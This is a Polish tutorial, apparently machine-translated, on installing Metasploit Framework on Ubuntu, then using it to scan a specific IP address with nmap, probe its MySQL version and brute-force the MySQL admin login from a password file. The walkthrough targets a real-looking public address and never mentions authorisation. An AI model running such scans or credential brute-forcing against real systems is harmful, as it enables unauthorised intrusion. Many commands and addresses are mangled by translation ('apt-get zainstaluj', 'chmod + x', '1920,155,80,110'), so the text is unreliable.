Spisie treści
Metasploit Framework, jest narzędzie do tworzenia i uruchamiania exploitów na komputerze lub serwerze. Metasploit Framework został napisany w języku Ruby, jest wieloplatformowy i do działania wymaga wydajnego komputera, dostępna jest wersja płatna i darmowa dla społeczności.Można go pobrać ze strony www.metasploit.com/framework/download
Zamontujemy w Ubutnu dla Linuksa, ale działa w przypadku innych dystrybucji, zmieniając niektóre polecenia.
Uzyskujemy dostęp do okna terminala i instalujemy ruby, zanim działał z perlem, ale został zaprogramowany zupełnie na nowo.
Instalujemy zależności ruby, dzięki czemu możemy następnie uruchomić framework.
sudo apt-get zainstaluj ruby libruby rdoc sudo apt-get zainstaluj libyaml-ruby sudo apt-get zainstaluj libzlib-ruby sudo apt-get zainstaluj libopenssl-ruby sudo apt-get zainstaluj libdl-ruby sudo apt-get zainstaluj libreadline-ruby sudo apt -get zainstaluj libiconv-ruby sudo apt-get zainstaluj rubygems * sudo apt-get zainstaluj libgtk2-ruby libglade2-ruby
Następnie w zależności od wersji jaką pobierzemy 32 lub 64 bit z terminka udzielimy pozwolenia:
chmod + x metasploit-latest-linux-x64-installer.run
Uruchamiamy instalator i otworzy się okno instalacji:
sudo metasploit-latest-linux-x64-installer.run
Pod koniec instalacji z okna terminala i z dostępem roota aktualizujemy framework
z poleceniem:
msfupdate
Metasploit to program bez środowiska graficznego, który działa całkowicie w terminalu. Dostęp do oprogramowania uzyskujemy z terminala za pomocą polecenia:
msfconsole
Wewnętrzna znajomość MSF
MSF (Metasploit Framework) Składa się z szeregu modułów, takich jak:
Exploity Jakie skrypty i programy są dostępne w MSF i jakich możemy używać, są one uporządkowane według systemu operacyjnego i kategorii, na przykład exploity / windows / przeglądarka / które są exploitami dostępnymi dla przeglądarek działających w systemie Windows.
Ładunki: Jest to działanie, które zostanie wykonane, jeśli testowana przez nas luka zostanie znaleziona i wykorzystana.
Pomocniczy: skrypty pomocnicze z różnymi funkcjami, takie jak pomocniczy / skaner / portscan / tcp i używając tego skanera portów tcp uzyskalibyśmy status portu. Ten skrypt jest alternatywą dla Nmapa.
Enkodery: Kodują skrypt, aby uniknąć niektórych programów antywirusowych i antyspamowych.
Przykład testowy zaczynamy od terminala, który wykonujemy:./msfconsole
Zaczniemy od zeskanowania adresu IP za pomocą nmap
msf> nmap -sV 190.155.80.110
Aktywujemy moduł pomocniczy, aby uzyskać dostęp do narzędzi skryptowych, które umożliwią pracę na mysql. Możemy też zobaczyć wersję modułu.
msf> pomocniczy (wersja_mysql)> ustaw RHOSTS 190.155.80.110 // ustaw zdalny adres IP msf> ustaw RHOSTS 192.155.80.110 msf> pomocniczy (wersja_mysql)> uruchom // sprawdź wersję mysql
Jeśli zostanie wykonany poprawnie, może zwrócić wersję mysql:
[*] 190.155.80.110 działa Mysql5.0
Kolejny przypadek z modułem skanującym i próbą zmiany użytkownika root mysql:
msf> użyj skanera / mysql / mysql_login msf> set NAZWA UŻYTKOWNIKA admin msf> set PASS_FILE /tmp/keys.lst // plik tekstowy z możliwymi kluczami jeden pod drugim msf> exploit
Jeśli zadziała możemy zalogować się do mysql:
mysql -h 1920,155,80,110 -u admin -pkey